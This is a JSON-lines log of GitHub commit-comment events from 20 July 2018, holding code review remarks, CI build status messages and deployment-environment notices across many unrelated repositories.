{"id":"7997023194","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29784197,"position":null,"line":null,"path":null,"commit_id":"172f7521937dddb366d16cffdaed7cd55e6970e2","created_at":"2018-07-20T20:23:03Z","updated_at":"2018-07-20T20:23:03Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T20:23:03Z"}
{"id":"7997023628","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29784199,"position":23,"line":36,"path":"lesson_2/shopping.rb","commit_id":"dbec462c1813a40b9e7a2d250d4b63dbce5ef8de","created_at":"2018-07-20T20:23:10Z","updated_at":"2018-07-20T20:23:10Z","author_association":"NONE","body":"Разбей создание списка покупко и его вывод\r\n\r\nсначала создаешь, потом полученный выводишь. У тебя вывод идет внутри products"}},"created_at":"2018-07-20T20:23:10Z"}
{"id":"7997024560","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29784202,"position":null,"line":null,"path":null,"commit_id":"c639fffb8ac0099c3fbb734741738c41bf61443e","created_at":"2018-07-20T20:23:23Z","updated_at":"2018-07-20T20:23:23Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/c639fffb8ac0099c3fbb734741738c41bf61443e/index.html"}},"created_at":"2018-07-20T20:23:23Z"}
{"id":"7997050143","type":"CommitCommentEvent","actor":{"login":"FiniteReality"},"repo":{"name":"Still34/Discord.Net"},"payload":{"comment":{"id":29784285,"position":11,"line":23,"path":"src/Discord.Net.Commands/Readers/UserTypeReader.cs","commit_id":"194a8aa4273caa4ea6723e6fab4d8b3f9efc0a00","created_at":"2018-07-20T20:29:36Z","updated_at":"2018-07-20T20:29:36Z","author_association":"NONE","body":"Leave this as is"}},"created_at":"2018-07-20T20:29:36Z"}
{"id":"7997050250","type":"CommitCommentEvent","actor":{"login":"luckman212"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29784286,"position":null,"line":null,"path":null,"commit_id":"040a1579e474290abfc7a4a445e310ce8e462847","created_at":"2018-07-20T20:29:37Z","updated_at":"2018-07-20T20:29:37Z","author_association":"MEMBER","body":"@sdj38 what do you think?"}},"created_at":"2018-07-20T20:29:37Z"}
{"id":"7997051772","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29784289,"position":1,"line":201,"path":"src/wallet.js","commit_id":"f11c24fc77e652ef20aedc4153280fb83afd04d8","created_at":"2018-07-20T20:30:01Z","updated_at":"2018-07-20T20:30:01Z","author_association":"NONE","body":"Accept "}},"created_at":"2018-07-20T20:30:01Z"}
{"id":"7997051980","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29784293,"position":null,"line":null,"path":null,"commit_id":"863a6eee8e9e81dbbb749076debb2d61a611130c","created_at":"2018-07-20T20:30:03Z","updated_at":"2018-07-20T20:30:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-240](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-240).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-240-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T20:30:03Z"}
{"id":"7997052092","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29784294,"position":null,"line":null,"path":null,"commit_id":"b67856ede6d70c7d4b96c8bac3a88a25e2729e75","created_at":"2018-07-20T20:30:05Z","updated_at":"2018-07-20T20:30:05Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4479)*\n"}},"created_at":"2018-07-20T20:30:05Z"}
{"id":"7997053923","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29784304,"position":null,"line":null,"path":null,"commit_id":"9897d0119c2af2489a75f915140642d222a46ec5","created_at":"2018-07-20T20:30:30Z","updated_at":"2018-07-20T20:30:30Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-41](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-41-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-20T20:30:30Z"}
{"id":"7997055870","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29784308,"position":4,"line":204,"path":"src/wallet.js","commit_id":"f11c24fc77e652ef20aedc4153280fb83afd04d8","created_at":"2018-07-20T20:30:59Z","updated_at":"2018-07-20T20:30:59Z","author_association":"NONE","body":"True"}},"created_at":"2018-07-20T20:30:59Z"}
{"id":"7997056187","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29784309,"position":2,"line":202,"path":"src/wallet.js","commit_id":"f11c24fc77e652ef20aedc4153280fb83afd04d8","created_at":"2018-07-20T20:31:03Z","updated_at":"2018-07-20T20:31:03Z","author_association":"NONE","body":"Loan  external "}},"created_at":"2018-07-20T20:31:03Z"}
{"id":"7997060542","type":"CommitCommentEvent","actor":{"login":"FiniteReality"},"repo":{"name":"Still34/Discord.Net"},"payload":{"comment":{"id":29784321,"position":10,"line":105,"path":"src/Discord.Net.Rest/DiscordRestApiClient.cs","commit_id":"194a8aa4273caa4ea6723e6fab4d8b3f9efc0a00","created_at":"2018-07-20T20:32:09Z","updated_at":"2018-07-20T20:32:09Z","author_association":"NONE","body":"We should probably leave this one as is, too. If we're passing it from the public API, we should pass it to the private API too."}},"created_at":"2018-07-20T20:32:09Z"}
{"id":"7997060699","type":"CommitCommentEvent","actor":{"login":"jobymathew"},"repo":{"name":"jobymathew/C-Programs"},"payload":{"comment":{"id":29784322,"position":null,"line":null,"path":null,"commit_id":"3353e7c639336c579f7f78a21a4a9965fdee70b3","created_at":"2018-07-20T20:32:11Z","updated_at":"2018-07-20T20:32:11Z","author_association":"OWNER","body":"This is a c file"}},"created_at":"2018-07-20T20:32:11Z"}
{"id":"7997062905","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29784328,"position":126,"line":63,"path":"app/controllers/api/vcf_files_controller.rb","commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-20T20:32:44Z","updated_at":"2018-07-20T20:32:44Z","author_association":"COLLABORATOR","body":"indent with 2 spaces"}},"created_at":"2018-07-20T20:32:44Z"}
{"id":"7997063698","type":"CommitCommentEvent","actor":{"login":"onderweg"},"repo":{"name":"sputnikdev/eclipse-smarthome-bluetooth-binding"},"payload":{"comment":{"id":29784332,"position":40,"line":62,"path":"tags.md","commit_id":"483b7f30f56beb44541b9fd7ea167a31cf81bb03","created_at":"2018-07-20T20:32:57Z","updated_at":"2018-07-20T20:32:57Z","author_association":"NONE","body":"I'm curious:\r\nIs it not possible to set \"Alert Level\" to \"No alert\" (as seen in screenshot)? This might prevent the annoying beep when device is out of range, right?"}},"created_at":"2018-07-20T20:32:57Z"}
{"id":"7997066470","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"piperun/iploggerfilter"},"payload":{"comment":{"id":29784340,"position":3,"line":6,"path":"README.md","commit_id":"e4943f9196d825a7c6904159efad5bf732095fc6","created_at":"2018-07-20T20:33:37Z","updated_at":"2018-07-20T20:33:37Z","author_association":"NONE","body":"On ABP it won't work correctly, cuz it doesn't support direct blocking of pages."}},"created_at":"2018-07-20T20:33:37Z"}
{"id":"7997070273","type":"CommitCommentEvent","actor":{"login":"KamenShah"},"repo":{"name":"LitcoinOfficial/Litcoin-seeder"},"payload":{"comment":{"id":29784354,"position":null,"line":null,"path":null,"commit_id":"c16d1b44345a2e716d5ce2f2fa33737cb035a85c","created_at":"2018-07-20T20:34:35Z","updated_at":"2018-07-20T20:34:35Z","author_association":"NONE","body":"Change Magic Bytes"}},"created_at":"2018-07-20T20:34:35Z"}
{"id":"7997070611","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29784356,"position":null,"line":null,"path":null,"commit_id":"474a62d99de30b23fdbd9348a4a3c8218ff98b34","created_at":"2018-07-20T20:34:40Z","updated_at":"2018-07-20T20:34:40Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4480)*\n"}},"created_at":"2018-07-20T20:34:40Z"}
{"id":"7997071013","type":"CommitCommentEvent","actor":{"login":"flack"},"repo":{"name":"flack/ranger"},"payload":{"comment":{"id":29784359,"position":6,"line":315,"path":"src/Ranger.php","commit_id":"f97cb5c0d2b9f1c8d8be3dfcb6f55539fd57bbc4","created_at":"2018-07-20T20:34:47Z","updated_at":"2018-07-20T20:34:47Z","author_association":"OWNER","body":"Sorry, I forgot to mention: we'd have to clone `$end`, otherwise this:\r\n\r\n```php\r\n        $start = new \\DateTime('2012-01-10 10:00:00');\r\n        $end = new \\DateTime('2012-01-17 11:00:00');\r\n        \r\n        $r = new Ranger('en');\r\n        $r->setDateType(\\IntlDateFormatter::NONE);\r\n        $r->format($start, $end);\r\n        $r->setDateType(\\IntlDateFormatter::MEDIUM);\r\n        echo $r->format($start, $end);\r\n```\r\n\r\nwould no longer yield the same result as this:\r\n\r\n```php\r\n        $start = new \\DateTime('2012-01-10 10:00:00');\r\n        $end = new \\DateTime('2012-01-17 11:00:00');\r\n        \r\n        $r = new Ranger('en');\r\n        $r->setDateType(\\IntlDateFormatter::MEDIUM);\r\n        echo $r->format($start, $end);\r\n```\r\n\r\n(which would actually be a nice unit test)"}},"created_at":"2018-07-20T20:34:47Z"}
{"id":"7997072650","type":"CommitCommentEvent","actor":{"login":"benthomasson"},"repo":{"name":"jcpowermac/ansible-jupyter-kernel"},"payload":{"comment":{"id":29784363,"position":null,"line":null,"path":null,"commit_id":"ec8ad6f6847a80d000f8f57b0960b795c1a59710","created_at":"2018-07-20T20:35:11Z","updated_at":"2018-07-20T20:35:11Z","author_association":"NONE","body":"Please submit these two commits as a PR.  "}},"created_at":"2018-07-20T20:35:11Z"}
{"id":"7997079528","type":"CommitCommentEvent","actor":{"login":"landfillbaby"},"repo":{"name":"sirjuddington/SLADE"},"payload":{"comment":{"id":29784387,"position":null,"line":null,"path":null,"commit_id":"013de1565aad10e33f2afe2f902c99a91fadf96f","created_at":"2018-07-20T20:36:50Z","updated_at":"2018-07-20T20:36:50Z","author_association":"CONTRIBUTOR","body":"also maybe `-UN=UTF8` for zip and `-mtu+` for 7z just in case of non-ascii filenames"}},"created_at":"2018-07-20T20:36:50Z"}
{"id":"7997079650","type":"CommitCommentEvent","actor":{"login":"dpalchak"},"repo":{"name":"dpalchak/estoppel"},"payload":{"comment":{"id":29784388,"position":303,"line":303,"path":"cmake/EstoppelTools.cmake","commit_id":"90d0ddb9bb0f5b5af566fdf5569b117597c8e8f2","created_at":"2018-07-20T20:36:52Z","updated_at":"2018-07-20T20:36:52Z","author_association":"OWNER","body":"Wrong indent level\r\n"}},"created_at":"2018-07-20T20:36:52Z"}
{"id":"7997085421","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29784395,"position":null,"line":null,"path":null,"commit_id":"87a7d0f2e2b9a04d6ff26f3a463eb6abcd578568","created_at":"2018-07-20T20:38:19Z","updated_at":"2018-07-20T20:38:19Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4481)*\n"}},"created_at":"2018-07-20T20:38:19Z"}
{"id":"7997087339","type":"CommitCommentEvent","actor":{"login":"tyler-graves-39"},"repo":{"name":"zibbycakes/PNO_apartment_finding"},"payload":{"comment":{"id":29784398,"position":6,"line":3,"path":"pno_apt/src/apt_info.json","commit_id":"d0a2fc3368711a0edde9a41837d99f1786d22af7","created_at":"2018-07-20T20:38:45Z","updated_at":"2018-07-20T20:38:45Z","author_association":"COLLABORATOR","body":"This line of code is dumb."}},"created_at":"2018-07-20T20:38:45Z"}
{"id":"7997088266","type":"CommitCommentEvent","actor":{"login":"JeffreyPopek"},"repo":{"name":"JeffreyPopek/TheExcellentDucks"},"payload":{"comment":{"id":29784399,"position":null,"line":null,"path":null,"commit_id":"001441b52c000eb8dc02e6bf171e2efa7ee92dea","created_at":"2018-07-20T20:39:00Z","updated_at":"2018-07-20T20:39:00Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-20T20:39:00Z"}
{"id":"7997092373","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29784412,"position":null,"line":null,"path":null,"commit_id":"37786dd0b27e7910ffff034d0321e3cccddceb73","created_at":"2018-07-20T20:40:07Z","updated_at":"2018-07-20T20:40:07Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-9-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-9](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-9) for d8train."}},"created_at":"2018-07-20T20:40:07Z"}
{"id":"7997093500","type":"CommitCommentEvent","actor":{"login":"jhaynie"},"repo":{"name":"pinpt/agent"},"payload":{"comment":{"id":29784416,"position":5,"line":38,"path":"cmd/root.go","commit_id":"7f414254f9cc4ac0573a3bc81d9f2e9275a294e4","created_at":"2018-07-20T20:40:22Z","updated_at":"2018-07-20T20:40:22Z","author_association":"MEMBER","body":"remove update prefix, not necessary"}},"created_at":"2018-07-20T20:40:22Z"}
{"id":"7997094281","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29784419,"position":null,"line":null,"path":null,"commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-20T20:40:33Z","updated_at":"2018-07-20T20:40:33Z","author_association":"COLLABORATOR","body":"Please follow this guideline. https://github.com/airbnb/ruby \r\n\r\nI know I also made some incorrect indentation or incorrect coding style during development. And also you will find that there are two coding style in one file. It is because sometimes I copied the code from Tom, so the coding style is not consistent in the same file. \r\n\r\nFrom now on, we should start to follow the coding standard. We don't really have to be extremely strict like in company, but please don't just upload it, at least really review what you just uploaded in GitHub by yourself. \r\n\r\nAnd, we will switch to pull request from next patch."}},"created_at":"2018-07-20T20:40:33Z"}
{"id":"7997097433","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"acidanthera/AppleALC"},"payload":{"comment":{"id":29784425,"position":null,"line":null,"path":null,"commit_id":"5c48d7aa4bfbbd5dc3ec5cfa6b4822abd0afb45b","created_at":"2018-07-20T20:41:19Z","updated_at":"2018-07-20T20:41:19Z","author_association":"COLLABORATOR","body":"ncpi=2000 was never intended to somehow help getting audio working. This commit simply fixed a stupid typo in the code."}},"created_at":"2018-07-20T20:41:19Z"}
{"id":"7997097520","type":"CommitCommentEvent","actor":{"login":"nkroon61"},"repo":{"name":"nkroon61/hab-web-app-builder"},"payload":{"comment":{"id":29784427,"position":null,"line":null,"path":null,"commit_id":"2fe4c71ae43a044a33608f2eb654c09188bd2e4f","created_at":"2018-07-20T20:41:21Z","updated_at":"2018-07-20T20:41:21Z","author_association":"OWNER","body":"Looks fine"}},"created_at":"2018-07-20T20:41:21Z"}
{"id":"7997100238","type":"CommitCommentEvent","actor":{"login":"starryeyez024"},"repo":{"name":"RHElements/rhelements"},"payload":{"comment":{"id":29784433,"position":239,"line":245,"path":"elements/rh-accordion/test/rh-accordion_test.html","commit_id":"9b63aca80e7bce57f171a4b0c567613f85ad7a16","created_at":"2018-07-20T20:42:01Z","updated_at":"2018-07-20T20:42:01Z","author_association":"NONE","body":"@kylebuch8 you might want to check the background color property of nth child 1 & 2, to ensure striped is doing what you think its doing. "}},"created_at":"2018-07-20T20:42:01Z"}
{"id":"7997106534","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29784449,"position":null,"line":null,"path":null,"commit_id":"c6fe6a88209bb183c554aab605e825e798884e62","created_at":"2018-07-20T20:43:35Z","updated_at":"2018-07-20T20:43:35Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/select-posts-selector-overlapping-posts/92731/4\n"}},"created_at":"2018-07-20T20:43:35Z"}
{"id":"7997107428","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29784452,"position":null,"line":null,"path":null,"commit_id":"0065a008f23a140cf0dfb945de46f7bba483d987","created_at":"2018-07-20T20:43:48Z","updated_at":"2018-07-20T20:43:48Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-864](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-864).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-864-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T20:43:48Z"}
{"id":"7997119148","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29784483,"position":null,"line":null,"path":null,"commit_id":"87effdf9878922a36c4abf952c086933d27a2b36","created_at":"2018-07-20T20:46:48Z","updated_at":"2018-07-20T20:46:48Z","author_association":"COLLABORATOR","body":"@pauldhein @stephensj2 @cl4yton I moved the notebook to `delphi/notebooks` from delphi/program_analysis, and also when you are in the notebooks directory, you can call `./scripts/export_to_html`."}},"created_at":"2018-07-20T20:46:48Z"}
{"id":"7997132851","type":"CommitCommentEvent","actor":{"login":"nospam2000"},"repo":{"name":"bigbelette/global-tunnel"},"payload":{"comment":{"id":29784538,"position":null,"line":null,"path":null,"commit_id":"2a4d0f2f050ede4c58a52bf05cd24adca5ce8a7b","created_at":"2018-07-20T20:50:09Z","updated_at":"2018-07-20T20:50:09Z","author_association":"NONE","body":"this allows Hyperledger Fabric to work with global-tunnel"}},"created_at":"2018-07-20T20:50:09Z"}
{"id":"7997135452","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29784548,"position":null,"line":null,"path":null,"commit_id":"7e2d9846a6eddec5be9d23ff2aa40d55a11b67e6","created_at":"2018-07-20T20:50:47Z","updated_at":"2018-07-20T20:50:47Z","author_association":"NONE","body":"<3"}},"created_at":"2018-07-20T20:50:47Z"}
{"id":"7997136612","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29784551,"position":19,"line":9,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Food2Door/Application.java","commit_id":"ce2d551a137f805dd052a49b75495b58f590257b","created_at":"2018-07-20T20:51:04Z","updated_at":"2018-07-20T20:51:04Z","author_association":"NONE","body":"Tutaj nie powinno być HealthyShop ponieważ jest od zadeklarowany na stałe. Metoda process mogłaby wybierać odpowiedni sklep z mapy typu String, Shop. Klucz to np nazwa produktu, wartość to konkretny sklep"}},"created_at":"2018-07-20T20:51:04Z"}
{"id":"7997136855","type":"CommitCommentEvent","actor":{"login":"javadkhodadadi"},"repo":{"name":"javadkhodadadi/javadkhodadadi.github.io"},"payload":{"comment":{"id":29784552,"position":null,"line":null,"path":null,"commit_id":"bf80f810ef5bfcc23fab029f2b6dfee004802e77","created_at":"2018-07-20T20:51:08Z","updated_at":"2018-07-20T20:51:08Z","author_association":"OWNER","body":"![header_background](https://user-images.githubusercontent.com/41486349/43024716-50279dd6-8c84-11e8-9479-c85835c13f8e.jpg)\r\n"}},"created_at":"2018-07-20T20:51:08Z"}
{"id":"7997141457","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29784568,"position":null,"line":null,"path":null,"commit_id":"0a0b286ce740b00915407a293e9098f7c3ae29da","created_at":"2018-07-20T20:52:19Z","updated_at":"2018-07-20T20:52:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-877](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-877).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-877-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T20:52:19Z"}
{"id":"7997143486","type":"CommitCommentEvent","actor":{"login":"IMystical"},"repo":{"name":"ripxfrostbite/VRChatJava"},"payload":{"comment":{"id":29784574,"position":85,"line":173,"path":"src/io/github/vrchatapi/VRCUser.java","commit_id":"5ef3bebcfdac464c7a5608f57bb88254ae1a2778","created_at":"2018-07-20T20:52:48Z","updated_at":"2018-07-20T20:52:48Z","author_association":"NONE","body":"I believe it's now based on the tags admin_moderator."}},"created_at":"2018-07-20T20:52:48Z"}
{"id":"7997148485","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29784584,"position":null,"line":null,"path":null,"commit_id":"8502693e81b98b8848c8a511def6d1e65bb4f729","created_at":"2018-07-20T20:54:03Z","updated_at":"2018-07-20T20:54:03Z","author_association":"CONTRIBUTOR","body":"La ligne 110 de  Keyed/Dialog_StatsReports.xml est fausse.\r\nJe la corrige à ma manière (\"a pourri\")."}},"created_at":"2018-07-20T20:54:03Z"}
{"id":"7997149713","type":"CommitCommentEvent","actor":{"login":"felixdivo"},"repo":{"name":"hardbyte/python-can"},"payload":{"comment":{"id":29784593,"position":5,"line":28,"path":"doc/interfaces.rst","commit_id":"6735a0ea753b70c19cf098fbb131daffcb1258df","created_at":"2018-07-20T20:54:22Z","updated_at":"2018-07-20T20:54:22Z","author_association":"COLLABORATOR","body":"Sure, breaking compatibility is always to be avoided. Where in the code are the two entry points implemented? We could deprecate the old one but keep it for a while."}},"created_at":"2018-07-20T20:54:22Z"}
{"id":"7997153002","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"stinb/gitahead-test"},"payload":{"comment":{"id":29784601,"position":1,"line":4,"path":"test","commit_id":"a0bad38889e50aaad137aa0814bc5d66e29aed58","created_at":"2018-07-20T20:55:11Z","updated_at":"2018-07-20T20:55:11Z","author_association":"CONTRIBUTOR","body":"This is a comment with a newline character (\\n). The goal is to remove newlines inserted by GitHub\r\n\r\n-without removing any characters typed by the user.\r\n\r\n\r\n:)"}},"created_at":"2018-07-20T20:55:11Z"}
{"id":"7997156197","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29784617,"position":null,"line":null,"path":null,"commit_id":"172f7521937dddb366d16cffdaed7cd55e6970e2","created_at":"2018-07-20T20:55:58Z","updated_at":"2018-07-20T20:55:58Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-20T20:55:58Z"}
{"id":"7997158952","type":"CommitCommentEvent","actor":{"login":"klinzmandr"},"repo":{"name":"klinzmandr/MBBFReg"},"payload":{"comment":{"id":29784658,"position":null,"line":null,"path":null,"commit_id":"04802fc417dda57fcf8c3e5b0568092158a0e818","created_at":"2018-07-20T20:56:37Z","updated_at":"2018-07-20T20:56:37Z","author_association":"OWNER","body":"Tightly integrated registration and event scheduling system for use by festval administrators."}},"created_at":"2018-07-20T20:56:37Z"}
{"id":"7997162054","type":"CommitCommentEvent","actor":{"login":"Benerdchia"},"repo":{"name":"git-lfs/git-lfs"},"payload":{"comment":{"id":29784672,"position":null,"line":null,"path":null,"commit_id":"d263a97f38ff9e614347162f9fc7f1c79d331dab","created_at":"2018-07-20T20:57:25Z","updated_at":"2018-07-20T20:57:25Z","author_association":"NONE","body":"#d\r\n263a97"}},"created_at":"2018-07-20T20:57:25Z"}
{"id":"7997163194","type":"CommitCommentEvent","actor":{"login":"ripxfrostbite"},"repo":{"name":"ripxfrostbite/VRChatJava"},"payload":{"comment":{"id":29784675,"position":85,"line":173,"path":"src/io/github/vrchatapi/VRCUser.java","commit_id":"5ef3bebcfdac464c7a5608f57bb88254ae1a2778","created_at":"2018-07-20T20:57:42Z","updated_at":"2018-07-20T20:57:42Z","author_association":"OWNER","body":"For the moderator power thing, makes sense, it just got moved cause my IDE changed the format a bit."}},"created_at":"2018-07-20T20:57:42Z"}
{"id":"7997190339","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Daniil-Ageev/QC_Project"},"payload":{"comment":{"id":29784756,"position":20,"line":12,"path":"rest_api.py","commit_id":"a05769149808daf9e895e161a45801afc4d12a25","created_at":"2018-07-20T21:04:19Z","updated_at":"2018-07-20T21:04:19Z","author_association":"NONE","body":"Use one leading underscore only for non-public methods and instance variables. Generally, double leading underscores should be used only to avoid name conflicts with attributes in classes designed to be subclassed.\r\n\r\n[See python naming conventions for more information.](https://www.python.org/dev/peps/pep-0008/?#naming-conventions)"}},"created_at":"2018-07-20T21:04:19Z"}
{"id":"7997191058","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29784758,"position":null,"line":null,"path":null,"commit_id":"1dfaf33e9110a8f7efd0053d167fdd36db403e03","created_at":"2018-07-20T21:04:30Z","updated_at":"2018-07-20T21:04:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-878](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-878).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-878-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T21:04:30Z"}
{"id":"7997193992","type":"CommitCommentEvent","actor":{"login":"zx70"},"repo":{"name":"z88dk/z88dk"},"payload":{"comment":{"id":29784763,"position":25,"line":25,"path":"libsrc/graphics/ace/udg/zx_hardcopy.asm","commit_id":"0968b9bfbcffae162f38991e349712f6a8191c6c","created_at":"2018-07-20T21:05:16Z","updated_at":"2018-07-20T21:05:16Z","author_association":"MEMBER","body":"good point.   I'm still cleaning it,  though.   I don't know if I'll be able to stuff the rightmost column printing in the main loop, but I should at least print out what's on the screen rather than keeping it blank. \r\nThe ace has its own font in rom in a compressed format and I could also work on it.   the redefined characters are not accessible,  so I'm overwriting the font tail directly via loadudg6"}},"created_at":"2018-07-20T21:05:16Z"}
{"id":"7997198320","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29784774,"position":null,"line":null,"path":null,"commit_id":"7f08e211f6a6e5e6fd7b8874f88929d7730b9629","created_at":"2018-07-20T21:06:24Z","updated_at":"2018-07-20T21:06:24Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-881](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-881).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-881-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T21:06:24Z"}
